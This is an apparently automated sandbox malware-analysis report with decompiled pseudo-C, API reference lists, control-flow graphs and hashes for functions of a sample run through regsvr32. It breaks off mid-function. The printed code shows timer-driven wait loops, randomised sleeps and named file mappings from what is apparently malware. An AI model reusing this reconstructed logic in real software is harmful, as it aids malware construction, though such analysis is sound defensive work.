                                                  0x00c88d3a
                                                  0x00c88d3d
                                                  0x00c88e41
                                                  0x00c88e49
                                                  0x00000000
                                                  0x00c88e49
                                                  0x00c88d46
                                                  0x00c88d4d
                                                  0x00c88d55
                                                  0x00c88d5a
                                                  0x00c88d63
                                                  0x00c88d69
                                                  0x00c88d70
                                                  0x00c88d77
                                                  0x00c88d7a
                                                  0x00c88e79
                                                  0x00c88e2d
                                                  0x00c88e2d
                                                  0x00c88e32
                                                  0x00c88e3d
                                                  0x00c88e3f
                                                  0x00000000
                                                  0x00c88e3f
                                                  0x00c88d84
                                                  0x00c88d8b
                                                  0x00c88d8e
                                                  0x00c88d93
                                                  0x00c88d9e
                                                  0x00c88da3
                                                  0x00c88da6
                                                  0x00c88dac
                                                  0x00c88db2
                                                  0x00c88db8
                                                  0x00c88dbb
                                                  0x00c88dc1
                                                  0x00c88dc4
                                                  0x00c88dc9
                                                  0x00c88dcd
                                                  0x00c88dcd
                                                  0x00c88dd9
                                                  0x00c88de5
                                                  0x00c88de9
                                                  0x00c88deb
                                                  0x00c88df0
                                                  0x00c88df2
                                                  0x00c88df7
                                                  0x00c88dfc
                                                  0x00c88e09
                                                  0x00c88e11
                                                  0x00c88e14
                                                  0x00c88e14
                                                  0x00c88df0
                                                  0x00000000
                                                  0x00c88ddb
                                                  0x00c88ddf
                                                  0x00c88e16
                                                  0x00c88e19
                                                  0x00c88e22
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00c88e22
                                                  0x00c88de1
                                                  0x00000000
                                                  0x00c88de1
                                                  0x00c88dd9

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00C88BA8
                                                  • wsprintfA.USER32 ref: 00C88BF8
                                                  • wsprintfA.USER32 ref: 00C88C15
                                                  • wsprintfA.USER32 ref: 00C88C41
                                                  • HeapFree.KERNEL32(00000000,?), ref: 00C88C53
                                                  • wsprintfA.USER32 ref: 00C88C74
                                                  • HeapFree.KERNEL32(00000000,?), ref: 00C88C84
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00C88CB2
                                                  • GetTickCount.KERNEL32 ref: 00C88CC3
                                                  • RtlEnterCriticalSection.NTDLL(010A9570), ref: 00C88CD7
                                                  • RtlLeaveCriticalSection.NTDLL(010A9570), ref: 00C88CF5
                                                    • Part of subcall function 00C88307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,00C8A428,?,010A95B0), ref: 00C88332
                                                    • Part of subcall function 00C88307: lstrlen.KERNEL32(?,?,?,00C8A428,?,010A95B0), ref: 00C8833A
                                                    • Part of subcall function 00C88307: strcpy.NTDLL ref: 00C88351
                                                    • Part of subcall function 00C88307: lstrcat.KERNEL32(00000000,?), ref: 00C8835C
                                                    • Part of subcall function 00C88307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00C8A428,?,010A95B0), ref: 00C88379
                                                  • StrTrimA.SHLWAPI(00000000,00C8C2AC,?,010A95B0), ref: 00C88D2C
                                                    • Part of subcall function 00C83CC8: lstrlen.KERNEL32(010A87FA,00000000,00000000,74ECC740,00C8A453,00000000), ref: 00C83CD8
                                                    • Part of subcall function 00C83CC8: lstrlen.KERNEL32(?), ref: 00C83CE0
                                                    • Part of subcall function 00C83CC8: lstrcpy.KERNEL32(00000000,010A87FA), ref: 00C83CF4
                                                    • Part of subcall function 00C83CC8: lstrcat.KERNEL32(00000000,?), ref: 00C83CFF
                                                  • lstrcpy.KERNEL32(00000000,?), ref: 00C88D4D
                                                  • lstrcpy.KERNEL32(?,?), ref: 00C88D55
                                                  • lstrcat.KERNEL32(?,?), ref: 00C88D63
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00C88D69
                                                    • Part of subcall function 00C8809F: lstrlen.KERNEL32(?,00000000,00C8D330,00000001,00C82200,00C8D00C,00C8D00C,00000000,00000005,00000000,00000000,?,?,?,00C896C1,00C823E9), ref: 00C880A8
                                                    • Part of subcall function 00C8809F: mbstowcs.NTDLL ref: 00C880CF
                                                    • Part of subcall function 00C8809F: memset.NTDLL ref: 00C880E1
                                                  • wcstombs.NTDLL ref: 00C88DFC
                                                    • Part of subcall function 00C8163F: SysAllocString.OLEAUT32(?), ref: 00C81680
                                                    • Part of subcall function 00C8163F: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 00C81702
                                                    • Part of subcall function 00C8163F: StrStrIW.SHLWAPI(?,006E0069), ref: 00C81741
                                                    • Part of subcall function 00C89039: HeapFree.KERNEL32(00000000,00000000,00C87F18,00000000,?,?,00000000), ref: 00C89045
                                                  • HeapFree.KERNEL32(00000000,?,?), ref: 00C88E3D
                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00C88E49
                                                  • HeapFree.KERNEL32(00000000,?,?,010A95B0), ref: 00C88E55
                                                  • HeapFree.KERNEL32(00000000,?), ref: 00C88E61
                                                  • RtlFreeHeap.NTDLL(00000000,?), ref: 00C88E6D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                                  • String ID:
                                                  • API String ID: 603507560-0
                                                  • Opcode ID: f9e837dcb33f7d2204771a6c35a9e5ecb4831e1dfebc9b5858a6c354e502959e
                                                  • Instruction ID: cfb2ac93035a77851faf70d0b951722509d530f242a88caa7f196431a7bb291f
                                                  • Opcode Fuzzy Hash: f9e837dcb33f7d2204771a6c35a9e5ecb4831e1dfebc9b5858a6c354e502959e
                                                  • Instruction Fuzzy Hash: 05912871900208EFCB11EFA4DC88BAE7BB9EF48354F144055F906E72A0DB319D55EB69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C86786, Relevance: 16.6, APIs: 11, Instructions: 150timememoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 97 c86786-c867b2 memset CreateWaitableTimerA 98 c867b8-c86808 _allmul SetWaitableTimer WaitForMultipleObjects 97->98 99 c86913-c86919 GetLastError 97->99 101 c8680a-c8680d 98->101 102 c86883-c86888 98->102 100 c8691c-c86923 99->100 103 c86818 101->103 104 c8680f call c873fd 101->104 105 c86889-c8688d 102->105 109 c86822 103->109 110 c86814-c86816 104->110 107 c8689d-c868a1 105->107 108 c8688f-c86897 HeapFree 105->108 107->105 111 c868a3-c868ac CloseHandle 107->111 108->107 112 c86825-c86829 109->112 110->103 110->109 111->100 113 c8683b-c86864 call c88504 112->113 114 c8682b-c86832 112->114 118 c868ae-c868b3 113->118 119 c86866-c8686f 113->119 114->113 115 c86834 114->115 115->113 121 c868d2-c868da 118->121 122 c868b5-c868bb 118->122 119->112 120 c86871-c86880 call c83bf1 119->120 120->102 123 c868e0-c86908 _allmul SetWaitableTimer WaitForMultipleObjects 121->123 122->102 125 c868bd-c868d0 call c8a1b0 122->125 123->112 126 c8690e 123->126 125->123 126->102
                                                  C-Code - Quality: 83%
                                                  			E00C86786(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0xc8d240);
					_v20 = 0;
					_v16 = 0;
					L00C8B0C8();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0xc8d26c; // 0x2c8
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0xc8d24c = 5;
						} else {
							_t68 = E00C873FD(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0xc8d260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E00C88504(_t72, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_t90 = _t65 - 3;
						_v12 = _t65;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E00C83BF1(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0xc8d244);
							goto L21;
						} else {
							__eflags =  *0xc8d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E00C8A1B0();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0xc8d248);
								L21:
								L00C8B0C8();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t64;
								_v8.LowPart = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0xc8d238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                                  0x00c86786
                                                  0x00c86798
                                                  0x00c8679b
                                                  0x00c867a7
                                                  0x00c867af
                                                  0x00c867b2
                                                  0x00c86919
                                                  0x00c867b8
                                                  0x00c867b8
                                                  0x00c867ba
                                                  0x00c867bf
                                                  0x00c867c0
                                                  0x00c867c6
                                                  0x00c867c9
                                                  0x00c867cc
                                                  0x00c867da
                                                  0x00c867e5
                                                  0x00c867e8
                                                  0x00c867ea
                                                  0x00c867f7
                                                  0x00c86801
                                                  0x00c86805
                                                  0x00c86808
                                                  0x00c8680d
                                                  0x00c86818
                                                  0x00c86818
                                                  0x00c8680f
                                                  0x00c8680f
                                                  0x00c86816
                                                  0x00000000
                                                  0x00000000
                                                  0x00c86816
                                                  0x00c86822
                                                  0x00000000
                                                  0x00c86825
                                                  0x00c86829
                                                  0x00c86834
                                                  0x00c86834
                                                  0x00c8683b
                                                  0x00c86844
                                                  0x00c8684b
                                                  0x00c86854
                                                  0x00c86857
                                                  0x00c8685a
                                                  0x00c86861
                                                  0x00c86864
                                                  0x00000000
                                                  0x00000000
                                                  0x00c86866
                                                  0x00c86869
                                                  0x00c8686c
                                                  0x00c8686f
                                                  0x00000000
                                                  0x00c86871
                                                  0x00c86880
                                                  0x00c86880
                                                  0x00000000
                                                  0x00c868ae
                                                  0x00c868ae
                                                  0x00c868b3
                                                  0x00c868d2
                                                  0x00c868d4
                                                  0x00c868d9
                                                  0x00c868da
                                                  0x00000000
                                                  0x00c868b5
                                                  0x00c868b5
                                                  0x00c868bb
                                                  0x00000000
                                                  0x00c868bd
                                                  0x00c868bd
                                                  0x00c868c2
                                                  0x00c868c4
                                                  0x00c868c9
                                                  0x00c868ca
                                                  0x00c868e0
                                                  0x00c868e0
                                                  0x00c868e8
                                                  0x00c868f3
                                                  0x00c868f6
                                                  0x00c86901
                                                  0x00c86903
                                                  0x00c86905
                                                  0x00c86908
                                                  0x00000000
                                                  0x00c8690e
                                                  0x00000000
                                                  0x00c8690e
                                                  0x00c86908
                                                  0x00c868bb
                                                  0x00000000
                                                  0x00c868b3
                                                  0x00c86883
                                                  0x00c86885
                                                  0x00c86888
                                                  0x00c86889
                                                  0x00c86889
                                                  0x00c8688d
                                                  0x00c86897
                                                  0x00c86897
                                                  0x00c8689d
                                                  0x00c868a0
                                                  0x00c868a0
                                                  0x00c868a6
                                                  0x00c868a6
                                                  0x00c86923
                                                  0x00000000

                                                  APIs
                                                  • memset.NTDLL ref: 00C8679B
                                                  • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00C867A7
                                                  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00C867CC
                                                  • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00C867E8
                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00C86801
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00C86897
                                                  • CloseHandle.KERNEL32(?), ref: 00C868A6
                                                  • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00C868E0
                                                  • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00C82417,?), ref: 00C868F6
                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00C86901
                                                    • Part of subcall function 00C873FD: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,010A9388,00000000,?,7519F710,00000000,7519F730), ref: 00C8744C
                                                    • Part of subcall function 00C873FD: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,010A93C0,?,00000000,30314549,00000014,004F0053,010A937C), ref: 00C874E9
                                                    • Part of subcall function 00C873FD: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00C86814), ref: 00C874FB
                                                  • GetLastError.KERNEL32 ref: 00C86913
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                  • String ID:
                                                  • API String ID: 3521023985-0
                                                  • Opcode ID: 5a9695bbc5d47705e478608554d5df1f29ebacbfe23c2a749a08899c6bf0dfda
                                                  • Instruction ID: ec76c38ca198fb25e1895be00598383cc13cf93099c75db7003dcbfb0e0aafa2
                                                  • Opcode Fuzzy Hash: 5a9695bbc5d47705e478608554d5df1f29ebacbfe23c2a749a08899c6bf0dfda
                                                  • Instruction Fuzzy Hash: 8C516DB1801228EBDF10EF94DC84EEEBFB9EF49368F204116F415A2191D7749A44DBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 005E163F, Relevance: 15.1, APIs: 10, Instructions: 98threadsleepsynchronizationCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 130 5e163f-5e1652 call 5e1850 133 5e1658 130->133 134 5e1740-5e1742 130->134 135 5e1659-5e1690 GetSystemTime SwitchToThread call 5e18f4 Sleep 133->135 138 5e1692-5e1694 135->138 139 5e173f 138->139 140 5e169a-5e169e 138->140 139->134 141 5e16ef-5e170a call 5e12dc 140->141 142 5e16a0-5e16ab call 5e1538 140->142 147 5e170c-5e171a WaitForSingleObject 141->147 148 5e1730-5e1732 GetLastError 141->148 149 5e16ad-5e16bf GetLongPathNameW 142->149 150 5e16e9 142->150 153 5e171c-5e1721 GetExitCodeThread 147->153 154 5e1727-5e172e CloseHandle 147->154 155 5e1735-5e173b 148->155 151 5e16e1-5e16e7 149->151 152 5e16c1-5e16d2 call 5e1de1 149->152 150->141 151->141 152->151 159 5e16d4-5e16da GetLongPathNameW call 5e1dfc 152->159 153->154 154->155 155->139 156 5e173d GetLastError 155->156 156->139 161 5e16df 159->161 161->141
                                                  C-Code - Quality: 79%
                                                  			E005E163F(char _a4) {
				long _v8;
				struct _SYSTEMTIME _v24;
				char _v48;
				void* __edi;
				long _t20;
				int _t22;
				long _t25;
				long _t26;
				long _t30;
				void* _t36;
				intOrPtr _t38;
				intOrPtr _t43;
				signed int _t44;
				void* _t48;
				signed int _t51;
				void* _t54;
				intOrPtr* _t55;

				_t20 = E005E1850();
				_v8 = _t20;
				if(_t20 != 0) {
					return _t20;
				}
				do {
					GetSystemTime( &_v24);
					_t22 = SwitchToThread();
					asm("cdq");
					_t44 = 9;
					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
					_t25 = E005E18F4(0, _t51); // executed
					_v8 = _t25;
					Sleep(_t51 << 5); // executed
					_t26 = _v8;
				} while (_t26 == 0xc);
				if(_t26 != 0) {
					L18:
					return _t26;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t54 = E005E12DC(E005E135A,  &_v48);
					if(_t54 == 0) {
						_v8 = GetLastError();
					} else {
						_t30 = WaitForSingleObject(_t54, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t54,  &_v8);
						}
						CloseHandle(_t54);
					}
					_t26 = _v8;
					if(_t26 == 0xffffffff) {
						_t26 = GetLastError();
					}
					goto L18;
				}
				if(E005E1538(_t44,  &_a4) != 0) {
					 *0x5e4138 = 0;
					goto L11;
				}
				_t43 = _a4;
				_t55 = __imp__GetLongPathNameW;
				_t36 =  *_t55(_t43, 0, 0); // executed
				_t48 = _t36;
				if(_t48 == 0) {
					L9:
					 *0x5e4138 = _t43;
					goto L11;
				}
				_t14 = _t48 + 2; // 0x2
				_t38 = E005E1DE1(_t48 + _t14);
				 *0x5e4138 = _t38;
				if(_t38 == 0) {
					goto L9;
				}
				 *_t55(_t43, _t38, _t48); // executed
				E005E1DFC(_t43);
				goto L11;
			}




















                                                  0x005e1646
                                                  0x005e164f
                                                  0x005e1652
                                                  0x005e1742
                                                  0x005e1742
                                                  0x005e1659
                                                  0x005e165d
                                                  0x005e1663
                                                  0x005e1671
                                                  0x005e1672
                                                  0x005e1675
                                                  0x005e1678
                                                  0x005e1681
                                                  0x005e1684
                                                  0x005e168a
                                                  0x005e168d
                                                  0x005e1694
                                                  0x005e173f
                                                  0x00000000
                                                  0x005e173f
                                                  0x005e169e
                                                  0x005e16ef
                                                  0x005e16ef
                                                  0x005e1705
                                                  0x005e170a
                                                  0x005e1732
                                                  0x005e170c
                                                  0x005e170f
                                                  0x005e1717
                                                  0x005e171a
                                                  0x005e1721
                                                  0x005e1721
                                                  0x005e1728
                                                  0x005e1728
                                                  0x005e1735
                                                  0x005e173b
                                                  0x005e173d
                                                  0x005e173d
                                                  0x00000000
                                                  0x005e173b
                                                  0x005e16ab
                                                  0x005e16e9
                                                  0x00000000
                                                  0x005e16e9
                                                  0x005e16ad
                                                  0x005e16b0
                                                  0x005e16b9
                                                  0x005e16bb
                                                  0x005e16bf
                                                  0x005e16e1
                                                  0x005e16e1
                                                  0x00000000
                                                  0x005e16e1
                                                  0x005e16c1
                                                  0x005e16c6
                                                  0x005e16cd
                                                  0x005e16d2
                                                  0x00000000
                                                  0x00000000
                                                  0x005e16d7
                                                  0x005e16da
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 005E1850: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,005E164B,751463F0), ref: 005E185F
                                                    • Part of subcall function 005E1850: GetVersion.KERNEL32 ref: 005E186E
                                                    • Part of subcall function 005E1850: GetCurrentProcessId.KERNEL32 ref: 005E1885
                                                    • Part of subcall function 005E1850: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 005E189E
                                                  • GetSystemTime.KERNEL32(?,00000000,751463F0), ref: 005E165D
                                                  • SwitchToThread.KERNEL32 ref: 005E1663
                                                    • Part of subcall function 005E18F4: VirtualAlloc.KERNELBASE(00000000,005E167D,00003000,00000004,?,?,005E167D,00000000), ref: 005E194A
                                                    • Part of subcall function 005E18F4: memcpy.NTDLL(?,?,005E167D,?,?,005E167D,00000000), ref: 005E19DC
                                                    • Part of subcall function 005E18F4: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,005E167D,00000000), ref: 005E19F7
                                                  • Sleep.KERNELBASE(00000000,00000000), ref: 005E1684
                                                  • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 005E16B9
                                                  • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 005E16D7
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 005E170F
                                                  • GetExitCodeThread.KERNEL32(00000000,?), ref: 005E1721
                                                  • CloseHandle.KERNEL32(00000000), ref: 005E1728
                                                  • GetLastError.KERNEL32(?,00000000), ref: 005E1730
                                                  • GetLastError.KERNEL32 ref: 005E173D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Offset: 005E0000, based on PE: true
                                                  • Associated: 00000002.00000002.646415549.00000000005E5000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_5e0000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
                                                  • String ID:
                                                  • API String ID: 2280543912-0
                                                  • Opcode ID: 10aea305b3c4b76526e40e787023aa5f3484f04c01f9b027ef39699f8d400185
                                                  • Instruction ID: 7fc2ec1e3bb399e1b50c16c43b31b010de004115b79e2151c3a695ae51b1e1f2
                                                  • Opcode Fuzzy Hash: 10aea305b3c4b76526e40e787023aa5f3484f04c01f9b027ef39699f8d400185
                                                  • Instruction Fuzzy Hash: C631C271900A95ABCB18EBE6DC8C9AE7EBDFF94360B150516E980D7140E730CB00EB69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 005E102F, Relevance: 13.6, APIs: 9, Instructions: 81filetimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 162 5e102f-5e1086 GetSystemTimeAsFileTime _aulldiv _snwprintf 163 5e108d-5e10a6 CreateFileMappingW 162->163 164 5e1088 162->164 165 5e10a8-5e10b1 163->165 166 5e10f0-5e10f6 GetLastError 163->166 164->163 168 5e10b3-5e10ba GetLastError 165->168 169 5e10c1-5e10cf MapViewOfFile 165->169 167 5e10f8-5e10fe 166->167 168->169 172 5e10bc-5e10bf 168->172 170 5e10df-5e10e5 GetLastError 169->170 171 5e10d1-5e10dd 169->171 170->167 173 5e10e7-5e10ee CloseHandle 170->173 171->167 172->173 173->167
                                                  C-Code - Quality: 69%
                                                  			E005E102F(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L005E2100();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x5e4150;
				_push(_t15 + 0x5e505e);
				_push(_t15 + 0x5e5054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L005E20FA();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x5e4140, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














                                                  0x005e102f
                                                  0x005e1038
                                                  0x005e103c
                                                  0x005e1042
                                                  0x005e1047
                                                  0x005e104c
                                                  0x005e104f
                                                  0x005e1052
                                                  0x005e1057
                                                  0x005e1058
                                                  0x005e105b
                                                  0x005e1066
                                                  0x005e106d
                                                  0x005e1071
                                                  0x005e1073
                                                  0x005e1074
                                                  0x005e1077
                                                  0x005e107c
                                                  0x005e1086
                                                  0x005e1088
                                                  0x005e1088
                                                  0x005e109c
                                                  0x005e10a2
                                                  0x005e10a6
                                                  0x005e10f6
                                                  0x005e10a8
                                                  0x005e10b1
                                                  0x005e10c7
                                                  0x005e10cf
                                                  0x005e10e1
                                                  0x005e10e5
                                                  0x00000000
                                                  0x00000000
                                                  0x005e10d1
                                                  0x005e10d4
                                                  0x005e10d9
                                                  0x005e10db
                                                  0x005e10db
                                                  0x005e10bc
                                                  0x005e10be
                                                  0x005e10e7
                                                  0x005e10e8
                                                  0x005e10e8
                                                  0x005e10b1
                                                  0x005e10fe

                                                  APIs
                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 005E103C
                                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 005E1052
                                                  • _snwprintf.NTDLL ref: 005E1077
                                                  • CreateFileMappingW.KERNELBASE(000000FF,005E4140,00000004,00000000,?,?), ref: 005E109C
                                                  • GetLastError.KERNEL32 ref: 005E10B3
                                                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 005E10C7
                                                  • GetLastError.KERNEL32 ref: 005E10DF
                                                  • CloseHandle.KERNEL32(00000000), ref: 005E10E8
                                                  • GetLastError.KERNEL32 ref: 005E10F0
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Offset: 005E0000, based on PE: true
                                                  • Associated: 00000002.00000002.646415549.00000000005E5000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_5e0000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                  • String ID:
                                                  • API String ID: 1724014008-0
                                                  • Opcode ID: 5ccd9dcf12fbfa28b426373054486903e2412c00fa50350e0a92939fe96745a5
                                                  • Instruction ID: 399ad72fb4b305aff7f61946482248bb46cf01bf87569f0e02466925717d5b4d
                                                  • Opcode Fuzzy Hash: 5ccd9dcf12fbfa28b426373054486903e2412c00fa50350e0a92939fe96745a5
                                                  • Instruction Fuzzy Hash: A021D6725001C4BFCB18EFA9DCCDEEE7BA9FB58350F104025F695DB150D6309A848B60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C81B2F, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 74%
                                                  			E00C81B2F(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00C8B0C2();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0xc8d27c; // 0x41a5a8
				_t5 = _t13 + 0xc8e862; // 0x10a8e0a
				_t6 = _t13 + 0xc8e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L00C8AD5A();
				_t17 = CreateFileMappingW(0xffffffff, 0xc8d2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
